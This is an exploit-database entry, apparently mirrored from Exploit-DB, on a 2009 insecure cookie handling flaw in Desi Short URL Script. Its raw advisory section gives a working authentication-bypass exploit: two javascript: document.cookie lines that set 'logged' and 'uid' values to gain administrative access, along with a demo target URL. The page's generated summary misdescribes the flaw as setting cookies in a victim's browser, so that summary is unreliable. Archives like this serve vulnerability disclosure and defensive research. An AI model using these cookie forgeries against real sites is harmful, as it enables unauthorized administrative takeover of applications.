header-logo
Suggest Exploit
vendor:
Desi Short URL Script
by:
N@bilX
7,5
CVSS
HIGH
Insecure Cookie Handling
264
CWE
Product Name: Desi Short URL Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: 42484
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Desi Short URL Insecure Cookie Handling Vulnerability

A vulnerability in Desi Short URL Script allows an attacker to set arbitrary cookies on the victim's browser. This can be exploited to gain administrative access to the application. The vulnerability is due to the application not properly verifying the cookie values. This can be exploited to set arbitrary cookies by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

Desi Short URL  Insecure Cookie Handling Vulnerability
Discovered By:N@bilX
Home:ma-exploit.com /m4r0c-s3curity.cc
email:eyx@hotmail.com
Not: jib L3az Wla Khaz [ma]
--------------------
download:http://webscripts.softpedia.com/script/Miscellaneous/Desi-Short-Url-Script-42484.html
exploit:
***
javascript:document.cookie = "logged =1";
javascript:document.cookie = "uid = 13";
-----------------
demo:http://www.desiscripts.com/demo/URL/index.php

# milw0rm.com [2009-06-10]

Navigation

Suggest Exploit

Services By CQR